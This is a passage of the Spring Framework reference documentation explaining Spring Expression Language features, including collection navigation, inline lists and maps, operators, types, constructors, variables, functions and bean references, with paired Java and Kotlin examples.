The instances of the `Inventor` class, `pupin` and `tesla`, were populated with\ndata listed in the <<expressions-example-classes, Classes used in the examples>> section.\nTo navigate \"`down`\" and get Tesla's year of birth and Pupin's city of birth, we use the following\nexpressions:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ evals to 1856\n\tint year = (Integer) parser.parseExpression(\"Birthdate.Year + 1900\").getValue(context);\n\n\tString city = (String) parser.parseExpression(\"placeOfBirth.City\").getValue(context);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ evals to 1856\n\tval year = parser.parseExpression(\"Birthdate.Year + 1900\").getValue(context) as Int\n\n\tval city = parser.parseExpression(\"placeOfBirth.City\").getValue(context) as String\n----\n\nCase insensitivity is allowed for the first letter of property names. The contents of\narrays and lists are obtained by using square bracket notation, as the following example\nshows:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\tEvaluationContext context = SimpleEvaluationContext.forReadOnlyDataBinding().build();\n\n\t\/\/ Inventions Array\n\n\t\/\/ evaluates to \"Induction motor\"\n\tString invention = parser.parseExpression(\"inventions[3]\").getValue(\n\t\t\tcontext, tesla, String.class);\n\n\t\/\/ Members List\n\n\t\/\/ evaluates to \"Nikola Tesla\"\n\tString name = parser.parseExpression(\"Members[0].Name\").getValue(\n\t\t\tcontext, ieee, String.class);\n\n\t\/\/ List and Array navigation\n\t\/\/ evaluates to \"Wireless communication\"\n\tString invention = parser.parseExpression(\"Members[0].Inventions[6]\").getValue(\n\t\t\tcontext, ieee, String.class);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\tval context = SimpleEvaluationContext.forReadOnlyDataBinding().build()\n\n\t\/\/ Inventions Array\n\n\t\/\/ evaluates to \"Induction motor\"\n\tval invention = parser.parseExpression(\"inventions[3]\").getValue(\n\t\t\tcontext, tesla, String::class.java)\n\n\t\/\/ Members List\n\n\t\/\/ evaluates to \"Nikola Tesla\"\n\tval name = parser.parseExpression(\"Members[0].Name\").getValue(\n\t\t\tcontext, ieee, String::class.java)\n\n\t\/\/ List and Array navigation\n\t\/\/ evaluates to \"Wireless communication\"\n\tval invention = parser.parseExpression(\"Members[0].Inventions[6]\").getValue(\n\t\t\tcontext, ieee, String::class.java)\n----\n\nThe contents of maps are obtained by specifying the literal key value within the\nbrackets. 
In the following example, because keys for the `Officers` map are strings, we can specify\nstring literals:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ Officer's Dictionary\n\n\tInventor pupin = parser.parseExpression(\"Officers['president']\").getValue(\n\t\t\tsocietyContext, Inventor.class);\n\n\t\/\/ evaluates to \"Idvor\"\n\tString city = parser.parseExpression(\"Officers['president'].PlaceOfBirth.City\").getValue(\n\t\t\tsocietyContext, String.class);\n\n\t\/\/ setting values\n\tparser.parseExpression(\"Officers['advisors'][0].PlaceOfBirth.Country\").setValue(\n\t\t\tsocietyContext, \"Croatia\");\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ Officer's Dictionary\n\n\tval pupin = parser.parseExpression(\"Officers['president']\").getValue(\n\t\t\tsocietyContext, Inventor::class.java)\n\n\t\/\/ evaluates to \"Idvor\"\n\tval city = parser.parseExpression(\"Officers['president'].PlaceOfBirth.City\").getValue(\n\t\t\tsocietyContext, String::class.java)\n\n\t\/\/ setting values\n\tparser.parseExpression(\"Officers['advisors'][0].PlaceOfBirth.Country\").setValue(\n\t\t\tsocietyContext, \"Croatia\")\n----\n\n\n\n[[expressions-inline-lists]]\n=== Inline Lists\n\nYou can directly express lists in an expression by using `{}` notation.\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ evaluates to a Java list containing the four numbers\n\tList numbers = (List) parser.parseExpression(\"{1,2,3,4}\").getValue(context);\n\n\tList listOfLists = (List) parser.parseExpression(\"{{'a','b'},{'x','y'}}\").getValue(context);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ evaluates to a Java list containing the four numbers\n\tval numbers = parser.parseExpression(\"{1,2,3,4}\").getValue(context) as List<*>\n\n\tval listOfLists = parser.parseExpression(\"{{'a','b'},{'x','y'}}\").getValue(context) as List<*>\n----\n\n`{}` by itself means an empty list. For performance reasons, if the list is itself\nentirely composed of fixed literals, a constant list is created to represent the\nexpression (rather than building a new list on each evaluation).\n\n\n\n[[expressions-inline-maps]]\n=== Inline Maps\n\nYou can also directly express maps in an expression by using `{key:value}` notation. The\nfollowing example shows how to do so:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ evaluates to a Java map containing the two entries\n\tMap inventorInfo = (Map) parser.parseExpression(\"{name:'Nikola',dob:'10-July-1856'}\").getValue(context);\n\n\tMap mapOfMaps = (Map) parser.parseExpression(\"{name:{first:'Nikola',last:'Tesla'},dob:{day:10,month:'July',year:1856}}\").getValue(context);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ evaluates to a Java map containing the two entries\n\tval inventorInfo = parser.parseExpression(\"{name:'Nikola',dob:'10-July-1856'}\").getValue(context) as Map<*, *>\n\n\tval mapOfMaps = parser.parseExpression(\"{name:{first:'Nikola',last:'Tesla'},dob:{day:10,month:'July',year:1856}}\").getValue(context) as Map<*, *>\t\n----\n\n`{:}` by itself means an empty map. For performance reasons, if the map is itself composed\nof fixed literals or other nested constant structures (lists or maps), a constant map is created\nto represent the expression (rather than building a new map on each evaluation). 
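This optimization applies only when every element is itself a literal (or a nested constant structure). As an illustrative sketch (assuming the same `parser` and a variable-capable `context` from the earlier examples), the following contrasts a fully literal map with one whose value is a variable reference and therefore must be rebuilt on each evaluation:\n\n[source,java,indent=0,subs=\"verbatim,quotes\"]\n----\n\t\/\/ composed entirely of literals, so a constant map can represent the expression\n\tMap constantMap = (Map) parser.parseExpression(\n\t\t\t\"{first:'Nikola',last:'Tesla'}\").getValue(context);\n\n\t\/\/ contains a variable reference, so the map is built afresh on each evaluation\n\tcontext.setVariable(\"last\", \"Tesla\");\n\tMap dynamicMap = (Map) parser.parseExpression(\n\t\t\t\"{first:'Nikola',last:#last}\").getValue(context);\n----\n\n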
Quoting of the map keys\nis optional. The examples above do not use quoted keys.\n\n\n\n[[expressions-array-construction]]\n=== Array Construction\n\nYou can build arrays by using the familiar Java syntax, optionally supplying an initializer\nto have the array populated at construction time. The following example shows how to do so:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tint[] numbers1 = (int[]) parser.parseExpression(\"new int[4]\").getValue(context);\n\n\t\/\/ Array with initializer\n\tint[] numbers2 = (int[]) parser.parseExpression(\"new int[]{1,2,3}\").getValue(context);\n\n\t\/\/ Multi-dimensional array\n\tint[][] numbers3 = (int[][]) parser.parseExpression(\"new int[4][5]\").getValue(context);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval numbers1 = parser.parseExpression(\"new int[4]\").getValue(context) as IntArray\n\n\t\/\/ Array with initializer\n\tval numbers2 = parser.parseExpression(\"new int[]{1,2,3}\").getValue(context) as IntArray\n\n\t\/\/ Multi-dimensional array\n\tval numbers3 = parser.parseExpression(\"new int[4][5]\").getValue(context) as Array<IntArray>\n----\n\nYou cannot currently supply an initializer when you construct a\nmulti-dimensional array.\n\n\n\n[[expressions-methods]]\n=== Methods\n\nYou can invoke methods by using typical Java programming syntax. You can also invoke methods\non literals. Variable arguments are also supported. The following examples show how to\ninvoke methods:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ string literal, evaluates to \"bc\"\n\tString bc = parser.parseExpression(\"'abc'.substring(1, 3)\").getValue(String.class);\n\n\t\/\/ evaluates to true\n\tboolean isMember = parser.parseExpression(\"isMember('Mihajlo Pupin')\").getValue(\n\t\t\tsocietyContext, Boolean.class);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ string literal, evaluates to \"bc\"\n\tval bc = parser.parseExpression(\"'abc'.substring(1, 3)\").getValue(String::class.java)\n\n\t\/\/ evaluates to true\n\tval isMember = parser.parseExpression(\"isMember('Mihajlo Pupin')\").getValue(\n\t\t\tsocietyContext, Boolean::class.java)\n----\n\n\n[[expressions-operators]]\n=== Operators\n\nThe Spring Expression Language supports the following kinds of operators:\n\n* <<expressions-operators-relational>>\n* <<expressions-operators-logical>>\n* <<expressions-operators-mathematical>>\n* <<expressions-assignment>>\n\n\n[[expressions-operators-relational]]\n==== Relational Operators\n\nThe relational operators (equal, not equal, less than, less than or equal, greater than,\nand greater than or equal) are supported by using standard operator notation. 
The\nfollowing listing shows a few examples of operators:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ evaluates to true\n\tboolean trueValue = parser.parseExpression(\"2 == 2\").getValue(Boolean.class);\n\n\t\/\/ evaluates to false\n\tboolean falseValue = parser.parseExpression(\"2 < -5.0\").getValue(Boolean.class);\n\n\t\/\/ evaluates to true\n\tboolean trueValue = parser.parseExpression(\"'black' < 'block'\").getValue(Boolean.class);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ evaluates to true\n\tval trueValue = parser.parseExpression(\"2 == 2\").getValue(Boolean::class.java)\n\n\t\/\/ evaluates to false\n\tval falseValue = parser.parseExpression(\"2 < -5.0\").getValue(Boolean::class.java)\n\n\t\/\/ evaluates to true\n\tval trueValue = parser.parseExpression(\"'black' < 'block'\").getValue(Boolean::class.java)\n----\n\n[NOTE]\n====\nGreater-than and less-than comparisons against `null` follow a simple rule: `null` is treated as\nnothing (that is NOT as zero). As a consequence, any other value is always greater\nthan `null` (`X > null` is always `true`) and no other value is ever less than nothing\n(`X < null` is always `false`).\n\nIf you prefer numeric comparisons instead, avoid number-based `null` comparisons\nin favor of comparisons against zero (for example, `X > 0` or `X < 0`).\n====\n\nIn addition to the standard relational operators, SpEL supports the `instanceof` and regular\nexpression-based `matches` operator. The following listing shows examples of both:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ evaluates to false\n\tboolean falseValue = parser.parseExpression(\n\t\t\t\"'xyz' instanceof T(Integer)\").getValue(Boolean.class);\n\n\t\/\/ evaluates to true\n\tboolean trueValue = parser.parseExpression(\n\t\t\t\"'5.00' matches '^-?\\\\d+(\\\\.\\\\d{2})?$'\").getValue(Boolean.class);\n\n\t\/\/evaluates to false\n\tboolean falseValue = parser.parseExpression(\n\t\t\t\"'5.0067' matches '^-?\\\\d+(\\\\.\\\\d{2})?$'\").getValue(Boolean.class);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ evaluates to false\n\tval falseValue = parser.parseExpression(\n\t\t\t\"'xyz' instanceof T(Integer)\").getValue(Boolean::class.java)\n\n\t\/\/ evaluates to true\n\tval trueValue = parser.parseExpression(\n\t\t\t\"'5.00' matches '^-?\\\\d+(\\\\.\\\\d{2})?$'\").getValue(Boolean::class.java)\n\n\t\/\/evaluates to false\n\tval falseValue = parser.parseExpression(\n\t\t\t\"'5.0067' matches '^-?\\\\d+(\\\\.\\\\d{2})?$'\").getValue(Boolean::class.java)\n----\n\nCAUTION: Be careful with primitive types, as they are immediately boxed up to the wrapper type,\nso `1 instanceof T(int)` evaluates to `false` while `1 instanceof T(Integer)`\nevaluates to `true`, as expected.\n\nEach symbolic operator can also be specified as a purely alphabetic equivalent. This\navoids problems where the symbols used have special meaning for the document type in\nwhich the expression is embedded (such as in an XML document). 
The textual equivalents are:\n\n* `lt` (`<`)\n* `gt` (`>`)\n* `le` (`\\<=`)\n* `ge` (`>=`)\n* `eq` (`==`)\n* `ne` (`!=`)\n* `div` (`\/`)\n* `mod` (`%`)\n* `not` (`!`).\n\nAll of the textual operators are case-insensitive.\n\n\n[[expressions-operators-logical]]\n==== Logical Operators\n\nSpEL supports the following logical operators:\n\n* `and` (`&&`)\n* `or` (`||`)\n* `not` (`!`)\n\nThe following example shows how to use the logical operators\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ -- AND --\n\n\t\/\/ evaluates to false\n\tboolean falseValue = parser.parseExpression(\"true and false\").getValue(Boolean.class);\n\n\t\/\/ evaluates to true\n\tString expression = \"isMember('Nikola Tesla') and isMember('Mihajlo Pupin')\";\n\tboolean trueValue = parser.parseExpression(expression).getValue(societyContext, Boolean.class);\n\n\t\/\/ -- OR --\n\n\t\/\/ evaluates to true\n\tboolean trueValue = parser.parseExpression(\"true or false\").getValue(Boolean.class);\n\n\t\/\/ evaluates to true\n\tString expression = \"isMember('Nikola Tesla') or isMember('Albert Einstein')\";\n\tboolean trueValue = parser.parseExpression(expression).getValue(societyContext, Boolean.class);\n\n\t\/\/ -- NOT --\n\n\t\/\/ evaluates to false\n\tboolean falseValue = parser.parseExpression(\"!true\").getValue(Boolean.class);\n\n\t\/\/ -- AND and NOT --\n\tString expression = \"isMember('Nikola Tesla') and !isMember('Mihajlo Pupin')\";\n\tboolean falseValue = parser.parseExpression(expression).getValue(societyContext, Boolean.class);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ -- AND --\n\n\t\/\/ evaluates to false\n\tval falseValue = parser.parseExpression(\"true and false\").getValue(Boolean::class.java)\n\n\t\/\/ evaluates to true\n\tval expression = \"isMember('Nikola Tesla') and isMember('Mihajlo Pupin')\"\n\tval trueValue = parser.parseExpression(expression).getValue(societyContext, Boolean::class.java)\n\n\t\/\/ -- OR --\n\n\t\/\/ evaluates to true\n\tval trueValue = parser.parseExpression(\"true or false\").getValue(Boolean::class.java)\n\n\t\/\/ evaluates to true\n\tval expression = \"isMember('Nikola Tesla') or isMember('Albert Einstein')\"\n\tval trueValue = parser.parseExpression(expression).getValue(societyContext, Boolean::class.java)\n\n\t\/\/ -- NOT --\n\n\t\/\/ evaluates to false\n\tval falseValue = parser.parseExpression(\"!true\").getValue(Boolean::class.java)\n\n\t\/\/ -- AND and NOT --\n\tval expression = \"isMember('Nikola Tesla') and !isMember('Mihajlo Pupin')\"\n\tval falseValue = parser.parseExpression(expression).getValue(societyContext, Boolean::class.java)\n----\n\n\n[[expressions-operators-mathematical]]\n==== Mathematical Operators\n\nYou can use the addition operator on both numbers and strings. You can use the subtraction, multiplication,\nand division operators only on numbers. You can also use\nthe modulus (%) and exponential power (^) operators. Standard operator precedence is enforced. 
The\nfollowing example shows the mathematical operators in use:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ Addition\n\tint two = parser.parseExpression(\"1 + 1\").getValue(Integer.class); \/\/ 2\n\n\tString testString = parser.parseExpression(\n\t\t\t\"'test' + ' ' + 'string'\").getValue(String.class); \/\/ 'test string'\n\n\t\/\/ Subtraction\n\tint four = parser.parseExpression(\"1 - -3\").getValue(Integer.class); \/\/ 4\n\n\tdouble d = parser.parseExpression(\"1000.00 - 1e4\").getValue(Double.class); \/\/ -9000\n\n\t\/\/ Multiplication\n\tint six = parser.parseExpression(\"-2 * -3\").getValue(Integer.class); \/\/ 6\n\n\tdouble twentyFour = parser.parseExpression(\"2.0 * 3e0 * 4\").getValue(Double.class); \/\/ 24.0\n\n\t\/\/ Division\n\tint minusTwo = parser.parseExpression(\"6 \/ -3\").getValue(Integer.class); \/\/ -2\n\n\tdouble one = parser.parseExpression(\"8.0 \/ 4e0 \/ 2\").getValue(Double.class); \/\/ 1.0\n\n\t\/\/ Modulus\n\tint three = parser.parseExpression(\"7 % 4\").getValue(Integer.class); \/\/ 3\n\n\tint remainder = parser.parseExpression(\"8 \/ 5 % 2\").getValue(Integer.class); \/\/ 1\n\n\t\/\/ Operator precedence\n\tint minusTwentyOne = parser.parseExpression(\"1+2-3*8\").getValue(Integer.class); \/\/ -21\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ Addition\n\tval two = parser.parseExpression(\"1 + 1\").getValue(Int::class.java) \/\/ 2\n\n\tval testString = parser.parseExpression(\n\t\t\t\"'test' + ' ' + 'string'\").getValue(String::class.java) \/\/ 'test string'\n\n\t\/\/ Subtraction\n\tval four = parser.parseExpression(\"1 - -3\").getValue(Int::class.java) \/\/ 4\n\n\tval d = parser.parseExpression(\"1000.00 - 1e4\").getValue(Double::class.java) \/\/ -9000\n\n\t\/\/ Multiplication\n\tval six = parser.parseExpression(\"-2 * -3\").getValue(Int::class.java) \/\/ 6\n\n\tval twentyFour = parser.parseExpression(\"2.0 * 3e0 * 4\").getValue(Double::class.java) \/\/ 24.0\n\n\t\/\/ Division\n\tval minusTwo = parser.parseExpression(\"6 \/ -3\").getValue(Int::class.java) \/\/ -2\n\n\tval one = parser.parseExpression(\"8.0 \/ 4e0 \/ 2\").getValue(Double::class.java) \/\/ 1.0\n\n\t\/\/ Modulus\n\tval three = parser.parseExpression(\"7 % 4\").getValue(Int::class.java) \/\/ 3\n\n\tval remainder = parser.parseExpression(\"8 \/ 5 % 2\").getValue(Int::class.java) \/\/ 1\n\n\t\/\/ Operator precedence\n\tval minusTwentyOne = parser.parseExpression(\"1+2-3*8\").getValue(Int::class.java) \/\/ -21\n----\n\n\n[[expressions-assignment]]\n==== The Assignment Operator\n\nTo set a property, use the assignment operator (`=`). This is typically\ndone within a call to `setValue` but can also be done inside a call to `getValue`. 
The\nfollowing listing shows both ways to use the assignment operator:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tInventor inventor = new Inventor();\n\tEvaluationContext context = SimpleEvaluationContext.forReadWriteDataBinding().build();\n\n\tparser.parseExpression(\"Name\").setValue(context, inventor, \"Aleksandar Seovic\");\n\n\t\/\/ alternatively\n\tString aleks = parser.parseExpression(\n\t\t\t\"Name = 'Aleksandar Seovic'\").getValue(context, inventor, String.class);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval inventor = Inventor()\n\tval context = SimpleEvaluationContext.forReadWriteDataBinding().build()\n\n\tparser.parseExpression(\"Name\").setValue(context, inventor, \"Aleksandar Seovic\")\n\n\t\/\/ alternatively\n\tval aleks = parser.parseExpression(\n\t\t\t\"Name = 'Aleksandar Seovic'\").getValue(context, inventor, String::class.java)\n----\n\n\n[[expressions-types]]\n=== Types\n\nYou can use the special `T` operator to specify an instance of `java.lang.Class` (the\ntype). Static methods are invoked by using this operator as well. The\n`StandardEvaluationContext` uses a `TypeLocator` to find types, and the\n`StandardTypeLocator` (which can be replaced) is built with an understanding of the\n`java.lang` package. This means that `T()` references to types within `java.lang` do not need to be\nfully qualified, but all other type references must be. The following example shows how\nto use the `T` operator:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tClass dateClass = parser.parseExpression(\"T(java.util.Date)\").getValue(Class.class);\n\n\tClass stringClass = parser.parseExpression(\"T(String)\").getValue(Class.class);\n\n\tboolean trueValue = parser.parseExpression(\n\t\t\t\"T(java.math.RoundingMode).CEILING < T(java.math.RoundingMode).FLOOR\")\n\t\t\t.getValue(Boolean.class);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval dateClass = parser.parseExpression(\"T(java.util.Date)\").getValue(Class::class.java)\n\n\tval stringClass = parser.parseExpression(\"T(String)\").getValue(Class::class.java)\n\n\tval trueValue = parser.parseExpression(\n\t\t\t\"T(java.math.RoundingMode).CEILING < T(java.math.RoundingMode).FLOOR\")\n\t\t\t.getValue(Boolean::class.java)\n----\n\n\n\n[[expressions-constructors]]\n=== Constructors\n\nYou can invoke constructors by using the `new` operator. You should use the fully qualified class name\nfor all but the primitive types (`int`, `float`, and so on) and String. 
The following\nexample shows how to use the `new` operator to invoke constructors:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tInventor einstein = p.parseExpression(\n\t\t\t\"new org.spring.samples.spel.inventor.Inventor('Albert Einstein', 'German')\")\n\t\t\t.getValue(Inventor.class);\n\n\t\/\/ create new inventor instance within add method of List\n\tp.parseExpression(\n\t\t\t\"Members.add(new org.spring.samples.spel.inventor.Inventor('Albert Einstein', 'German'))\")\n\t\t\t.getValue(societyContext);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval einstein = p.parseExpression(\n\t\t\t\"new org.spring.samples.spel.inventor.Inventor('Albert Einstein', 'German')\")\n\t\t\t.getValue(Inventor::class.java)\n\n\t\/\/ create new inventor instance within add method of List\n\tp.parseExpression(\n\t\t\t\"Members.add(new org.spring.samples.spel.inventor.Inventor('Albert Einstein', 'German'))\")\n\t\t\t.getValue(societyContext)\n----\n\n\n\n[[expressions-ref-variables]]\n=== Variables\n\nYou can reference variables in the expression by using the `#variableName` syntax. Variables\nare set by using the `setVariable` method on `EvaluationContext` implementations.\n\n[NOTE]\n====\nValid variable names must be composed of one or more of the following supported\ncharacters.\n\n* letters: `A` to `Z` and `a` to `z`\n* digits: `0` to `9`\n* underscore: `_`\n* dollar sign: `$`\n====\n\nThe following example shows how to use variables:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tInventor tesla = new Inventor(\"Nikola Tesla\", \"Serbian\");\n\n\tEvaluationContext context = SimpleEvaluationContext.forReadWriteDataBinding().build();\n\tcontext.setVariable(\"newName\", \"Mike Tesla\");\n\n\tparser.parseExpression(\"Name = #newName\").getValue(context, tesla);\n\tSystem.out.println(tesla.getName()); \/\/ \"Mike Tesla\"\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval tesla = Inventor(\"Nikola Tesla\", \"Serbian\")\n\n\tval context = SimpleEvaluationContext.forReadWriteDataBinding().build()\n\tcontext.setVariable(\"newName\", \"Mike Tesla\")\n\n\tparser.parseExpression(\"Name = #newName\").getValue(context, tesla)\n\tprintln(tesla.name) \/\/ \"Mike Tesla\"\n----\n\n\n[[expressions-this-root]]\n==== The `#this` and `#root` Variables\n\nThe `#this` variable is always defined and refers to the current evaluation object\n(against which unqualified references are resolved). The `#root` variable is always\ndefined and refers to the root context object. Although `#this` may vary as components of\nan expression are evaluated, `#root` always refers to the root. 
The following examples\nshow how to use the `#this` and `#root` variables:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ create a list of integers\n\tList<Integer> primes = new ArrayList<Integer>();\n\tprimes.addAll(Arrays.asList(2,3,5,7,11,13,17));\n\n\t\/\/ create parser and set variable 'primes' as the list of integers\n\tExpressionParser parser = new SpelExpressionParser();\n\tEvaluationContext context = SimpleEvaluationContext.forReadOnlyDataBinding().build();\n\tcontext.setVariable(\"primes\", primes);\n\n\t\/\/ all prime numbers > 10 from the list (using selection ?[...])\n\t\/\/ evaluates to [11, 13, 17]\n\tList<Integer> primesGreaterThanTen = (List<Integer>) parser.parseExpression(\n\t\t\t\"#primes.?[#this>10]\").getValue(context);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ create a list of integers\n\tval primes = ArrayList<Int>()\n\tprimes.addAll(listOf(2, 3, 5, 7, 11, 13, 17))\n\n\t\/\/ create parser and set variable 'primes' as the list of integers\n\tval parser = SpelExpressionParser()\n\tval context = SimpleEvaluationContext.forReadOnlyDataBinding().build()\n\tcontext.setVariable(\"primes\", primes)\n\n\t\/\/ all prime numbers > 10 from the list (using selection ?[...])\n\t\/\/ evaluates to [11, 13, 17]\n\tval primesGreaterThanTen = parser.parseExpression(\n\t\t\t\"#primes.?[#this>10]\").getValue(context) as List<Int>\n----\n\n\n\n[[expressions-ref-functions]]\n=== Functions\n\nYou can extend SpEL by registering user-defined functions that can be called within the\nexpression string. The function is registered through the `EvaluationContext`. The\nfollowing example shows how to register a user-defined function:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tMethod method = ...;\n\n\tEvaluationContext context = SimpleEvaluationContext.forReadOnlyDataBinding().build();\n\tcontext.setVariable(\"myFunction\", method);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval method: Method = ...\n\n\tval context = SimpleEvaluationContext.forReadOnlyDataBinding().build()\n\tcontext.setVariable(\"myFunction\", method)\n----\n\nFor example, consider the following utility method that reverses a string:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tpublic abstract class StringUtils {\n\n\t\tpublic static String reverseString(String input) {\n\t\t\tStringBuilder backwards = new StringBuilder(input.length());\n\t\t\tfor (int i = 0; i < input.length(); i++) {\n\t\t\t\tbackwards.append(input.charAt(input.length() - 1 - i));\n\t\t\t}\n\t\t\treturn backwards.toString();\n\t\t}\n\t}\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tfun reverseString(input: String): String {\n\t\tval backwards = StringBuilder(input.length)\n\t\tfor (i in 0 until input.length) {\n\t\t\tbackwards.append(input[input.length - 1 - i])\n\t\t}\n\t\treturn backwards.toString()\n\t}\n----\n\nYou can then register and use the preceding method, as the following example shows:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\n\tEvaluationContext context = SimpleEvaluationContext.forReadOnlyDataBinding().build();\n\tcontext.setVariable(\"reverseString\",\n\t\t\tStringUtils.class.getDeclaredMethod(\"reverseString\", String.class));\n\n\tString helloWorldReversed = 
parser.parseExpression(\n\t\t\t\"#reverseString('hello')\").getValue(context, String.class);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\n\tval context = SimpleEvaluationContext.forReadOnlyDataBinding().build()\n\tcontext.setVariable(\"reverseString\", ::reverseString.javaMethod)\n\n\tval helloWorldReversed = parser.parseExpression(\n\t\t\t\"#reverseString('hello')\").getValue(context, String::class.java)\n----\n\n\n\n[[expressions-bean-references]]\n=== Bean References\n\nIf the evaluation context has been configured with a bean resolver, you can\nlook up beans from an expression by using the `@` symbol. The following example shows how\nto do so:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\tStandardEvaluationContext context = new StandardEvaluationContext();\n\tcontext.setBeanResolver(new MyBeanResolver());\n\n\t\/\/ This will end up calling resolve(context,\"something\") on MyBeanResolver during evaluation\n\tObject bean = parser.parseExpression(\"@something\").getValue(context);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\tval context = StandardEvaluationContext()\n\tcontext.setBeanResolver(MyBeanResolver())\n\n\t\/\/ This will end up calling resolve(context,\"something\") on MyBeanResolver during evaluation\n\tval bean = parser.parseExpression(\"@something\").getValue(context)\n----\n\nTo access a factory bean itself, you should instead prefix the bean name with an `&` symbol.\nThe following example shows how to do so:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\tStandardEvaluationContext context = new StandardEvaluationContext();\n\tcontext.setBeanResolver(new MyBeanResolver());\n\n\t\/\/ This will end up calling resolve(context,\"&foo\") on MyBeanResolver during evaluation\n\tObject bean = parser.parseExpression(\"&foo\").getValue(context);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\tval context = StandardEvaluationContext()\n\tcontext.setBeanResolver(MyBeanResolver())\n\n\t\/\/ This will end up calling resolve(context,\"&foo\") on MyBeanResolver during evaluation\n\tval bean = parser.parseExpression(\"&foo\").getValue(context)\n----\n\n\n[[expressions-operator-ternary]]\n=== Ternary Operator (If-Then-Else)\n\nYou can use the ternary operator for performing if-then-else conditional logic inside\nthe expression. The following listing shows a minimal example:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tString falseString = parser.parseExpression(\n\t\t\t\"false ? 'trueExp' : 'falseExp'\").getValue(String.class);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval falseString = parser.parseExpression(\n\t\t\t\"false ? 'trueExp' : 'falseExp'\").getValue(String::class.java)\n----\n\nIn this case, the boolean `false` results in returning the string value `'falseExp'`. A more\nrealistic example follows:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tparser.parseExpression(\"Name\").setValue(societyContext, \"IEEE\");\n\tsocietyContext.setVariable(\"queryName\", \"Nikola Tesla\");\n\n\texpression = \"isMember(#queryName)? 
